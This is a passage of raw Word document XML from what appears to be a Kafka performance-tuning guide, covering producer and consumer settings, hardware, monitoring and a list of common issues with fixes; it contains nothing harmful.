    <w:p w14:paraId="4F8F03BA" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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Acks (acks)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The acks setting determines the level of acknowledgment the producer requires from the broker:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8EE05F" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="162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acks=0: No acknowledgment, fastest but least reliable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50426245" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="162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acks=1: The leader broker acknowledges once it writes the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC0CF07" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="162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acks=all: All brokers in the replication group must acknowledge the write (most reliable). Set acks=1 for a balance between reliability and performance, but use acks=all for higher data durability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D310D8"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c. Buffer Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2439E505" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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Buffer Memory (buffer.memory)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The buffer.memory setting defines how much memory the producer can use for buffering messages before sending them to the broker. Increase this buffer to accommodate higher throughput without dropping messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C13AD48"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d. Linger Time (linger.ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EB9365" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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linger.ms</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This setting controls how long the producer waits to send a batch of messages. Increasing linger.ms allows the producer to batch messages more efficiently but increases latency. Fine-tune this setting based on your desired trade-off between latency and throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D828DA3"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3. Optimizing Consumer Configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7480A178"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nsumers read messages from Kafka topics, and their configuration directly impacts how quickly and efficiently messages are processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BF7115"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a. Consumer Parallelism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C61E91B" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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Multiple Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka allows multiple consumers in a consumer group to read from different partitions in parallel. Ensure that you have enough consumers to handle the number of partitions. A good rule of thumb is to have at least as many consumers as partitions for maximum parallelism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7338664E"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b. Max Poll Records (max.poll.records)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B9B2B3" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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Max Poll Records</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The max.poll.records setting controls the maximum number of records the consumer will fetch in a single poll. Increasing this value can improve throughput, but it also increases memory usage, so it should be balanced with the consumer’s ability to process messages quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50095A50"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c. Consumer Fetch Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DA8E60" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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Fetch Min Bytes (fetch.min.bytes)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This setting ensures that the consumer will only receive data if at least this number of bytes are available. Increasing this value helps reduce network overhead by preventing the consumer from receiving small, unnecessary batches of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0894AE27" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162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Fetch Max Bytes (fetch.max.bytes)</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This sets the maximum amount of data that a consumer can fetch in a single request. Adjust this based on the consumer’s memory capacity and throughput requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE9C743"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d. Max Poll Interval (max.poll.interval.ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058E3EEB" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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Max Poll Interval</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This setting controls how long the consumer can take between consecutive poll calls before Kafka considers the consumer as "stalled" and triggers a rebalance. Ensure this value is large enough for your consumers to process large messages or batches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D106E3A"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4. Ensuring Adequate Hardware Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A616B08"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Kafka’s performance is also heavily influenced by the underlying hardware infrastructure. Ensure that your Kafka cluster is running on high-performance hardware and properly scaled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4653E214"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a. Disk I/O (SSD vs. HDD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1500BF" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kafka benefits from fast disk I/O, so using </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSDs</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is highly recommended, especially when handling high-throughput workloads. Kafka relies on the filesystem to store messages and retrieve them, so fast disk access is critical for minimizing latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCA4CF2"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b. Memory (RAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF6A42C" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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Kafka brokers, producers, and consumers should have sufficient memory to handle caching and processing without frequent garbage collection (GC) pauses. Kafka uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OS page cache</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for data storage, so ensure that brokers have enough memory for efficient data access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37051808"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c. CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5977C1E6" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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Kafka brokers benefit from multi-core processors, as they can handle multiple threads concurrently. Ensure that the CPU is capable of handling the number of partitions, consumers, and network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625669F9"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d. Network Throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C51FF" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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Kafka relies heavily on network throughput for sending messages between producers, brokers, and consumers. Ensure that the network infrastructure has sufficient bandwidth to handle the expected load, especially in high-throughput scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475263A0"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5. Monitoring and Fine-Tuning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC4CF9C"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ntinuous monitoring is essential to ensure optimal performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D6F63"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a. Use JMX Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86E907" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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Kafka exposes </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JMX metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that allow you to monitor various performance indicators like throughput, latency, consumer lag, disk I/O, and network throughput. Use monitoring tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to visualize and alert on important metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A696FE"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b. Optimize Garbage Collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB8C3B" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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Garbage Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can become a bottleneck in Kafka, especially when handling large volumes of data. Tune the JVM settings to minimize GC overhead. For example, use the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>G1GC</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> garbage collector for better handling of larger heaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323F73F3"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c. Cluster Rebalancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474FF3D0" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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onitor the cluster to ensure an even distribution of partitions across brokers. Rebalance partitions if necessary to avoid any broker from becoming a bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614957CA"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B9C96E"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Kafka performance optimization requires a balanced approach, taking into account broker configurations, producer and consumer settings, hardware resources, and continuous monitoring. By fine-tuning Kafka’s configurations, scaling horizontally, and ensuring sufficient resources, you can achieve high throughput, low latency, and fault tolerance for your Kafka-based system. Regular monitoring and performance testing are crucial to maintaining an optimized Kafka environment, ensuring it can meet the demands of production workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBD67D0" w14:textId="3D9AB592"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1A569EF">
          <v:rect id="_x0000_i3246" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39447EB7" w14:textId="0CAE6930" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00591665" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="814" w:name="_Toc196308294"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are common Kafka issues and how can they be fixed</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="814"/>
    </w:p>
    <w:p w14:paraId="12F27883" w14:textId="3A7CD639" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Here’s a list of </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common Kafka issues</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> you might encounter in production, along with </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>explanations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fixes</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B05F7ED" w14:textId="77777777" w:rsidR="00E43F03"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73F7E0A">
          <v:rect id="_x0000_i3247" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F054419"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1. Consumer Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78123671"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ymptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBF7234" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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essages are not being processed in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648D171F" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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Lag increasing in Kafka monitoring tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BCDF33"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auses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCB6053" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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low consumer processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483B1DDA" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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Not enough consumers in a consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF51BE6" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="163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Network or I/O bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3C0904"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Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6632BCB6" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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cale out the number of consumers (match or exceed partition count).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E7F4A" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Optimize consumer logic for faster processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6064F" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Increase max.poll.records or fetch.min.bytes if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218CE908" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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une max.poll.interval.ms and session.timeout.ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D493B3" w14:textId="77777777" w:rsidR="00E43F03"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9D31B80">
          <v:rect id="_x0000_i3248" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="373311EB"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2. Broker Out of Disk Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4340AF"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ymptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58154B05" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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lastRenderedPageBreak/>
        <w:t>Kafka stops accepting messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EBE9AA" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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rrors in broker logs about insufficient disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6FF958"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auses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBD95F5" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Retention policies not tuned properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2ED4E9" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Very high throughput without cleanup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AAC0B2"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Fixes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAF1C2C" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Review and lower log.retention.hours or log.retention.bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED87D9B" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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nable log compaction or compression (compression.type=snappy/gzip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025787F1" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="164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Add more storage or scale out brokers to distribute load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7306D9ED" w14:textId="77777777" w:rsidR="00E43F03"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2D2DD7B">
          <v:rect id="_x0000_i3249" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E34DD6"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3. Under-Replicated Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732DFB82"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ymptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4616923A" w14:textId="77777777" w:rsidR="00E43F03" w:rsidRPr="004269A3" w:rsidRDefault="00E43F03" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
